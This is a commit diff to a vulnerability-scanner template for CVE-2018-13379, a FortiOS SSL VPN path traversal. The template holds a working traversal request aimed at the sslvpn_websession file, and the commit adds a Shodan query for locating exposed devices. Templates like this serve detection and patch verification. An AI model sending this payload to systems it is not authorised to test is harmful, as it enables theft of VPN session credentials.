Update CVE-2018-13379.yaml

2022-06-25 13:18:45 +05:30 · 2022-06-25 13:18:45 +05:30 · c0d51a6efa
parent 167ff1e909
commit c0d51a6efa
1 changed files with 9 additions and 5 deletions
--- a/cves/2018/CVE-2018-13379.yaml
+++ b/cves/2018/CVE-2018-13379.yaml
@ -14,15 +14,19 @@ info:
    cvss-score: 9.8
    cve-id: CVE-2018-13379
    cwe-id: CWE-22
-  tags: cve,cve2018,fortios,cisa
+  metadata:
+    verified: true
+    shodan-query: http.html:"/remote/login" "xxxxxxxx"
+  tags: cve,cve2018,fortios,cisa,lfi

 requests:
  - method: GET
    path:
      - "{{BaseURL}}/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession"
-    matchers:
-      - type: word
-        words:
-          - "var fgt_lang"

+    matchers:
+      - type: regex
+        part: body
+        regex:
+          - '^var fgt_lang ='
 # Enhanced by mp on 2022/05/12